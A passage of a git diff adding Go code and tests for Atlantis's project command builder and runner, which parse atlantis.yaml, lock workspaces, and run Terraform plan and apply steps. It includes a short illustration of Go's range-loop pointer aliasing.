+ AllowRepoConfig bool
+ AllowRepoConfigFlag string
+}
+
+// TerraformExec runs terraform commands.
+type TerraformExec interface {
+ RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) {
+ // We need to lock the workspace we're about to clone into.
+ workspace := DefaultWorkspace
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
+ if err != nil {
+ ctx.Log.Warn("workspace was locked")
+ return nil, err
+ }
+ ctx.Log.Debug("got workspace lock")
+ defer unlockFn()
+
+ repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace)
+ if err != nil {
+ return nil, err
+ }
+
+ // Parse config file if it exists.
+ var config valid.Config
+ hasConfigFile, err := p.ParserValidator.HasConfigFile(repoDir)
+ if err != nil {
+ return nil, errors.Wrapf(err, "looking for %s file in %q", yaml.AtlantisYAMLFilename, repoDir)
+ }
+ if hasConfigFile {
+ if !p.AllowRepoConfig {
+ return nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
+ }
+ config, err = p.ParserValidator.ReadConfig(repoDir)
+ if err != nil {
+ return nil, err
+ }
+ ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename)
+ } else {
+ ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename)
+ }
+
+ // We'll need the list of modified files.
+ modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
+ if err != nil {
+ return nil, err
+ }
+ ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles))
+
+ // Prepare the project contexts so the ProjectCommandRunner can execute.
+ var projCtxs []models.ProjectCommandContext
+
+ // If there is no config file, then we try to plan for each project that
+ // was modified in the pull request.
+ if !hasConfigFile {
+ modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir)
+ ctx.Log.Info("automatically determined that there were %d projects modified in this pull request: %s", len(modifiedProjects), modifiedProjects)
+ for _, mp := range modifiedProjects {
+ projCtxs = append(projCtxs, models.ProjectCommandContext{
+ BaseRepo: ctx.BaseRepo,
+ HeadRepo: ctx.HeadRepo,
+ Pull: ctx.Pull,
+ User: ctx.User,
+ Log: ctx.Log,
+ RepoRelDir: mp.Path,
+ ProjectConfig: nil,
+ GlobalConfig: nil,
+ CommentArgs: nil,
+ Workspace: DefaultWorkspace,
+ })
+ }
+ } else {
+ // Otherwise, we use the projects that match the WhenModified fields
+ // in the config file.
+ matchingProjects, err := p.ProjectFinder.DetermineProjectsViaConfig(ctx.Log, modifiedFiles, config, repoDir)
+ if err != nil {
+ return nil, err
+ }
+ ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects))
+
+ // Use an index loop rather than range because we take a pointer to each
+ // element's copy: with range, the loop variable is reused on every
+ // iteration, so all the pointers would alias a single variable.
+ for i := 0; i < len(matchingProjects); i++ {
+ mp := matchingProjects[i]
+ projCtxs = append(projCtxs, models.ProjectCommandContext{
+ BaseRepo: ctx.BaseRepo,
+ HeadRepo: ctx.HeadRepo,
+ Pull: ctx.Pull,
+ User: ctx.User,
+ Log: ctx.Log,
+ CommentArgs: nil,
+ Workspace: mp.Workspace,
+ RepoRelDir: mp.Dir,
+ ProjectConfig: &mp,
+ GlobalConfig: &config,
+ })
+ }
+ }
+ return projCtxs, nil
+}
+
+func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
+ var projCtx models.ProjectCommandContext
+
+ ctx.Log.Debug("building plan command")
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return projCtx, err
+ }
+ defer unlockFn()
+
+ ctx.Log.Debug("cloning repository")
+ repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace)
+ if err != nil {
+ return projCtx, err
+ }
+
+ return p.buildProjectCommandCtx(ctx, cmd, repoDir)
+}
+
+func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
+ var projCtx models.ProjectCommandContext
+
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return projCtx, err
+ }
+ defer unlockFn()
+
+ repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
+ if err != nil {
+ return projCtx, err
+ }
+
+ return p.buildProjectCommandCtx(ctx, cmd, repoDir)
+}
+
+func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContext, cmd *CommentCommand, repoDir string) (models.ProjectCommandContext, error) {
+ projCfg, globalCfg, err := p.getCfg(cmd.ProjectName, cmd.RepoRelDir, cmd.Workspace, repoDir)
+ if err != nil {
+ return models.ProjectCommandContext{}, err
+ }
+
+ // Override any dir/workspace from the comment with the values from the
+ // project config. In practice they can't conflict because a comment may
+ // specify either a project name or a dir/workspace, never both.
+ dir := cmd.RepoRelDir
+ workspace := cmd.Workspace
+ if projCfg != nil {
+ dir = projCfg.Dir
+ workspace = projCfg.Workspace
+ }
+
+ return models.ProjectCommandContext{
+ BaseRepo: ctx.BaseRepo,
+ HeadRepo: ctx.HeadRepo,
+ Pull: ctx.Pull,
+ User: ctx.User,
+ Log: ctx.Log,
+ CommentArgs: cmd.Flags,
+ Workspace: workspace,
+ RepoRelDir: dir,
+ ProjectConfig: projCfg,
+ GlobalConfig: globalCfg,
+ }, nil
+}
+
+func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, workspace string, repoDir string) (*valid.Project, *valid.Config, error) {
+ hasConfigFile, err := p.ParserValidator.HasConfigFile(repoDir)
+ if err != nil {
+ return nil, nil, errors.Wrapf(err, "looking for %s file in %q", yaml.AtlantisYAMLFilename, repoDir)
+ }
+ if !hasConfigFile {
+ if projectName != "" {
+ return nil, nil, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
+ }
+ return nil, nil, nil
+ }
+
+ if !p.AllowRepoConfig {
+ return nil, nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
+ }
+
+ globalCfg, err := p.ParserValidator.ReadConfig(repoDir)
+ if err != nil {
+ return nil, nil, err
+ }
+
+ // If they've specified a project by name we look it up. Otherwise we
+ // use the dir and workspace.
+ if projectName != "" {
+ projCfg := globalCfg.FindProjectByName(projectName)
+ if projCfg == nil {
+ return nil, nil, fmt.Errorf("no project with name %q is defined in %s", projectName, yaml.AtlantisYAMLFilename)
+ }
+ return projCfg, &globalCfg, nil
+ }
+
+ projCfgs := globalCfg.FindProjectsByDirWorkspace(dir, workspace)
+ if len(projCfgs) == 0 {
+ return nil, nil, nil
+ }
+ if len(projCfgs) > 1 {
+ return nil, nil, fmt.Errorf("must specify project name: more than one project defined in %s matched dir: %q workspace: %q", yaml.AtlantisYAMLFilename, dir, workspace)
+ }
+ return &projCfgs[0], &globalCfg, nil
+}
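
The index-loop comment in `BuildAutoplanCommands` guards against a classic Go pitfall. A standalone illustration under Go's pre-1.22 range semantics (the semantics in effect when this change was written):

```go
package main

import "fmt"

type project struct{ name string }

func main() {
	projects := []project{{"a"}, {"b"}}

	// With range (pre-Go 1.22), p is one variable reused on every
	// iteration, so each &p aliases the same storage.
	var aliased []*project
	for _, p := range projects {
		aliased = append(aliased, &p)
	}
	fmt.Println(aliased[0].name, aliased[1].name) // b b

	// The index form copies the element into a fresh variable first,
	// as BuildAutoplanCommands does, so each pointer is distinct.
	var fresh []*project
	for i := 0; i < len(projects); i++ {
		mp := projects[i]
		fresh = append(fresh, &mp)
	}
	fmt.Println(fresh[0].name, fresh[1].name) // a b
}
```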
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
new file mode 100644
index 0000000000..e9278a2042
--- /dev/null
+++ b/server/events/project_command_builder_test.go
@@ -0,0 +1,458 @@
+package events_test
+
+import (
+ "io/ioutil"
+ "path/filepath"
+ "testing"
+
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/models"
+ vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectCommandBuilder_BuildAutoplanCommands(t *testing.T) {
+ // exp defines what we will assert on. We don't check all fields in the
+ // actual contexts.
+ type exp struct {
+ projectConfig *valid.Project
+ dir string
+ workspace string
+ }
+ cases := []struct {
+ Description string
+ AtlantisYAML string
+ exp []exp
+ }{
+ {
+ Description: "no atlantis.yaml",
+ AtlantisYAML: "",
+ exp: []exp{
+ {
+ projectConfig: nil,
+ dir: ".",
+ workspace: "default",
+ },
+ },
+ },
+ {
+ Description: "autoplan disabled",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ autoplan:
+ enabled: false`,
+ exp: nil,
+ },
+ {
+ Description: "simple atlantis.yaml",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+`,
+ exp: []exp{
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "default",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "default",
+ },
+ },
+ },
+ {
+ Description: "some projects disabled",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ autoplan:
+ enabled: false
+- dir: .
+ workspace: myworkspace
+ autoplan:
+ when_modified: ["main.tf"]
+- dir: .
+ workspace: myworkspace2
+`,
+ exp: []exp{
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"main.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "myworkspace",
+ },
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace2",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "myworkspace2",
+ },
+ },
+ },
+ {
+ Description: "no projects modified",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: mydir
+`,
+ exp: nil,
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ RegisterMockTestingT(t)
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ baseRepo := models.Repo{}
+ headRepo := models.Repo{}
+ pull := models.PullRequest{}
+ logger := logging.NewNoopLogger()
+ workingDir := mocks.NewMockWorkingDir()
+ When(workingDir.Clone(logger, baseRepo, headRepo, pull, "default")).ThenReturn(tmpDir, nil)
+ if c.AtlantisYAML != "" {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, yaml.AtlantisYAMLFilename), []byte(c.AtlantisYAML), 0600)
+ Ok(t, err)
+ }
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "main.tf"), nil, 0600)
+ Ok(t, err)
+
+ vcsClient := vcsmocks.NewMockClientProxy()
+ When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
+
+ builder := &events.DefaultProjectCommandBuilder{
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ WorkingDir: workingDir,
+ ParserValidator: &yaml.ParserValidator{},
+ VCSClient: vcsClient,
+ ProjectFinder: &events.DefaultProjectFinder{},
+ AllowRepoConfig: true,
+ }
+
+ ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{
+ BaseRepo: baseRepo,
+ HeadRepo: headRepo,
+ Pull: pull,
+ User: models.User{},
+ Log: logger,
+ })
+ Ok(t, err)
+ Equals(t, len(c.exp), len(ctxs))
+
+ for i, actCtx := range ctxs {
+ expCtx := c.exp[i]
+ Equals(t, baseRepo, actCtx.BaseRepo)
+ Equals(t, headRepo, actCtx.HeadRepo)
+ Equals(t, pull, actCtx.Pull)
+ Equals(t, models.User{}, actCtx.User)
+ Equals(t, logger, actCtx.Log)
+ Equals(t, 0, len(actCtx.CommentArgs))
+
+ Equals(t, expCtx.projectConfig, actCtx.ProjectConfig)
+ Equals(t, expCtx.dir, actCtx.RepoRelDir)
+ Equals(t, expCtx.workspace, actCtx.Workspace)
+ }
+ })
+ }
+}
+
+func TestDefaultProjectCommandBuilder_BuildPlanApplyCommand(t *testing.T) {
+ cases := []struct {
+ Description string
+ AtlantisYAML string
+ Cmd events.CommentCommand
+ ExpProjectConfig *valid.Project
+ ExpCommentArgs []string
+ ExpWorkspace string
+ ExpDir string
+ ExpErr string
+ }{
+ {
+ Description: "no atlantis.yaml",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Flags: []string{"commentarg"},
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: "",
+ ExpProjectConfig: nil,
+ ExpCommentArgs: []string{"commentarg"},
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "no atlantis.yaml with project flag",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ ProjectName: "myproject",
+ },
+ AtlantisYAML: "",
+ ExpErr: "cannot specify a project name unless an atlantis.yaml file exists to configure projects",
+ },
+ {
+ Description: "simple atlantis.yaml",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ workspace: myworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: []string{"approved"},
+ },
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml wrong dir",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: notroot
+ workspace: myworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: nil,
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml wrong workspace",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ workspace: notmyworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: nil,
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml with projectname",
+ Cmd: events.CommentCommand{
+ Name: events.Plan,
+ ProjectName: "myproject",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- name: myproject
+ dir: .
+ workspace: myworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: []string{"approved"},
+ Name: String("myproject"),
+ },
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml with multiple dir/workspaces matching",
+ Cmd: events.CommentCommand{
+ Name: events.Plan,
+ RepoRelDir: ".",
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- name: myproject
+ dir: .
+ workspace: myworkspace
+ apply_requirements: [approved]
+- name: myproject2
+ dir: .
+ workspace: myworkspace
+`,
+ ExpErr: "must specify project name: more than one project defined in atlantis.yaml matched dir: \".\" workspace: \"myworkspace\"",
+ },
+ {
+ Description: "atlantis.yaml with project flag not matching",
+ Cmd: events.CommentCommand{
+ Name: events.Plan,
+ RepoRelDir: ".",
+ Workspace: "default",
+ ProjectName: "notconfigured",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+`,
+ ExpErr: "no project with name \"notconfigured\" is defined in atlantis.yaml",
+ },
+ }
+
+ for _, c := range cases {
+ // NOTE: we're testing both plan and apply here.
+ for _, cmdName := range []events.CommandName{events.Plan, events.Apply} {
+ t.Run(c.Description, func(t *testing.T) {
+ RegisterMockTestingT(t)
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ baseRepo := models.Repo{}
+ headRepo := models.Repo{}
+ pull := models.PullRequest{}
+ logger := logging.NewNoopLogger()
+ workingDir := mocks.NewMockWorkingDir()
+ if cmdName == events.Plan {
+ When(workingDir.Clone(logger, baseRepo, headRepo, pull, c.Cmd.Workspace)).ThenReturn(tmpDir, nil)
+ } else {
+ When(workingDir.GetWorkingDir(baseRepo, pull, c.Cmd.Workspace)).ThenReturn(tmpDir, nil)
+ }
+ if c.AtlantisYAML != "" {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, yaml.AtlantisYAMLFilename), []byte(c.AtlantisYAML), 0600)
+ Ok(t, err)
+ }
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "main.tf"), nil, 0600)
+ Ok(t, err)
+
+ vcsClient := vcsmocks.NewMockClientProxy()
+ When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
+
+ builder := &events.DefaultProjectCommandBuilder{
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ WorkingDir: workingDir,
+ ParserValidator: &yaml.ParserValidator{},
+ VCSClient: vcsClient,
+ ProjectFinder: &events.DefaultProjectFinder{},
+ AllowRepoConfig: true,
+ }
+
+ cmdCtx := &events.CommandContext{
+ BaseRepo: baseRepo,
+ HeadRepo: headRepo,
+ Pull: pull,
+ User: models.User{},
+ Log: logger,
+ }
+ var actCtx models.ProjectCommandContext
+
+ if cmdName == events.Plan {
+ actCtx, err = builder.BuildPlanCommand(cmdCtx, &c.Cmd)
+ } else {
+ actCtx, err = builder.BuildApplyCommand(cmdCtx, &c.Cmd)
+ }
+
+ if c.ExpErr != "" {
+ ErrEquals(t, c.ExpErr, err)
+ return
+ }
+
+ Ok(t, err)
+ Equals(t, baseRepo, actCtx.BaseRepo)
+ Equals(t, headRepo, actCtx.HeadRepo)
+ Equals(t, pull, actCtx.Pull)
+ Equals(t, models.User{}, actCtx.User)
+ Equals(t, logger, actCtx.Log)
+
+ Equals(t, c.ExpProjectConfig, actCtx.ProjectConfig)
+ Equals(t, c.ExpDir, actCtx.RepoRelDir)
+ Equals(t, c.ExpWorkspace, actCtx.Workspace)
+ Equals(t, c.ExpCommentArgs, actCtx.CommentArgs)
+ })
+ }
+ }
+}
+
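+// String returns a pointer to v. It's a convenience for building test
+// fixtures whose fields are of type *string.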
+func String(v string) *string { return &v }
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
new file mode 100644
index 0000000000..1da06d1ad0
--- /dev/null
+++ b/server/events/project_command_runner.go
@@ -0,0 +1,239 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "strings"
+
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/webhooks"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
+
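+// LockURLGenerator generates the URL that users can visit to view the lock
+// identified by lockID.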
+type LockURLGenerator interface {
+ GenerateLockURL(lockID string) string
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_step_runner.go StepRunner
+
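+// StepRunner runs a single step of a plan or apply stage.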
+type StepRunner interface {
+ Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_webhooks_sender.go WebhooksSender
+
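+// WebhooksSender sends webhook notifications about apply results.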
+type WebhooksSender interface {
+ Send(log *logging.SimpleLogger, res webhooks.ApplyResult) error
+}
+
+// PlanSuccess is the result of a successful plan.
+type PlanSuccess struct {
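+ // TerraformOutput is the combined output of the plan stage's steps.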
+ TerraformOutput string
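+ // LockURL is the URL where users can view the project lock.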
+ LockURL string
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_runner.go ProjectCommandRunner
+
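+// ProjectCommandRunner runs plan and apply commands for a single project.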
+type ProjectCommandRunner interface {
+ Plan(ctx models.ProjectCommandContext) ProjectCommandResult
+ Apply(ctx models.ProjectCommandContext) ProjectCommandResult
+}
+
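+// DefaultProjectCommandRunner implements ProjectCommandRunner.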
+type DefaultProjectCommandRunner struct {
+ Locker ProjectLocker
+ LockURLGenerator LockURLGenerator
+ InitStepRunner StepRunner
+ PlanStepRunner StepRunner
+ ApplyStepRunner StepRunner
+ RunStepRunner StepRunner
+ PullApprovedChecker runtime.PullApprovedChecker
+ WorkingDir WorkingDir
+ Webhooks WebhooksSender
+ WorkingDirLocker WorkingDirLocker
+ RequireApprovalOverride bool
+}
+
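+// Plan runs the plan stage for the project described by ctx, acquiring the
+// project lock and cloning the repo first.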
+func (p *DefaultProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
+ // Acquire Atlantis lock for this repo/dir/workspace.
+ lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelDir))
+ if err != nil {
+ return ProjectCommandResult{
+ Error: errors.Wrap(err, "acquiring lock"),
+ }
+ }
+ if !lockAttempt.LockAcquired {
+ return ProjectCommandResult{Failure: lockAttempt.LockFailureReason}
+ }
+ ctx.Log.Debug("acquired lock for project")
+
+ // Acquire internal lock for the directory we're going to operate in.
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return ProjectCommandResult{Error: err}
+ }
+ defer unlockFn()
+
+ // Clone is idempotent, so it's okay to run even if the repo was already cloned.
+ repoDir, cloneErr := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
+ if cloneErr != nil {
+ if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+ ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+ }
+ return ProjectCommandResult{Error: cloneErr}
+ }
+ projAbsPath := filepath.Join(repoDir, ctx.RepoRelDir)
+
+ // Use default stage unless another workflow is defined in config
+ stage := p.defaultPlanStage()
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+ ctx.Log.Debug("project configured to use workflow %q", *ctx.ProjectConfig.Workflow)
+ configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow)
+ if configuredStage != nil {
+ ctx.Log.Debug("project will use the configured stage for that workflow")
+ stage = *configuredStage
+ }
+ }
+ outputs, err := p.runSteps(stage.Steps, ctx, projAbsPath)
+ if err != nil {
+ if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+ ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+ }
+ return ProjectCommandResult{Error: fmt.Errorf("%s\n%s", err, strings.Join(outputs, "\n"))}
+ }
+
+ return ProjectCommandResult{
+ PlanSuccess: &PlanSuccess{
+ LockURL: p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey),
+ TerraformOutput: strings.Join(outputs, "\n"),
+ },
+ }
+}
+
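+// runSteps runs each step in order and returns the collected outputs. It
+// stops at the first step that errors.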
+func (p *DefaultProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
+ var outputs []string
+ for _, step := range steps {
+ var out string
+ var err error
+ switch step.StepName {
+ case "init":
+ out, err = p.InitStepRunner.Run(ctx, step.ExtraArgs, absPath)
+ case "plan":
+ out, err = p.PlanStepRunner.Run(ctx, step.ExtraArgs, absPath)
+ case "apply":
+ out, err = p.ApplyStepRunner.Run(ctx, step.ExtraArgs, absPath)
+ case "run":
+ out, err = p.RunStepRunner.Run(ctx, step.RunCommand, absPath)
+ }
+
+ if out != "" {
+ outputs = append(outputs, out)
+ }
+ if err != nil {
+ return outputs, err
+ }
+ }
+ return outputs, nil
+}
+
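+// Apply runs the apply stage for the project described by ctx after checking
+// any apply requirements, e.g. that the pull request is approved.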
+func (p *DefaultProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult {
+ repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)
+ if err != nil {
+ if os.IsNotExist(err) {
+ return ProjectCommandResult{Error: errors.New("project has not been cloned–did you run plan?")}
+ }
+ return ProjectCommandResult{Error: err}
+ }
+ absPath := filepath.Join(repoDir, ctx.RepoRelDir)
+
+ var applyRequirements []string
+ if ctx.ProjectConfig != nil {
+ applyRequirements = ctx.ProjectConfig.ApplyRequirements
+ }
+ if p.RequireApprovalOverride {
+ applyRequirements = []string{raw.ApprovedApplyRequirement}
+ }
+ for _, req := range applyRequirements {
+ switch req {
+ case raw.ApprovedApplyRequirement:
+ approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow
+ if err != nil {
+ return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
+ }
+ if !approved {
+ return ProjectCommandResult{Failure: "Pull request must be approved before running apply."}
+ }
+ }
+ }
+ // Acquire internal lock for the directory we're going to operate in.
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return ProjectCommandResult{Error: err}
+ }
+ defer unlockFn()
+
+ // Use default stage unless another workflow is defined in config
+ stage := p.defaultApplyStage()
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+ configuredStage := ctx.GlobalConfig.GetApplyStage(*ctx.ProjectConfig.Workflow)
+ if configuredStage != nil {
+ stage = *configuredStage
+ }
+ }
+ outputs, err := p.runSteps(stage.Steps, ctx, absPath)
+ p.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
+ Workspace: ctx.Workspace,
+ User: ctx.User,
+ Repo: ctx.BaseRepo,
+ Pull: ctx.Pull,
+ Success: err == nil,
+ })
+ if err != nil {
+ return ProjectCommandResult{Error: fmt.Errorf("%s\n%s", err, strings.Join(outputs, "\n"))}
+ }
+ return ProjectCommandResult{
+ ApplySuccess: strings.Join(outputs, "\n"),
+ }
+}
+
+func (p DefaultProjectCommandRunner) defaultPlanStage() valid.Stage {
+ return valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ {
+ StepName: "plan",
+ },
+ },
+ }
+}
+
+func (p DefaultProjectCommandRunner) defaultApplyStage() valid.Stage {
+ return valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "apply",
+ },
+ },
+ }
+}
diff --git a/server/events/project_command_runner_test.go b/server/events/project_command_runner_test.go
new file mode 100644
index 0000000000..85e2e2826b
--- /dev/null
+++ b/server/events/project_command_runner_test.go
@@ -0,0 +1,414 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "os"
+ "strings"
+ "testing"
+
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ mocks2 "github.com/runatlantis/atlantis/server/events/runtime/mocks"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectCommandRunner_Plan(t *testing.T) {
+ cases := []struct {
+ description string
+ projCfg *valid.Project
+ globalCfg *valid.Config
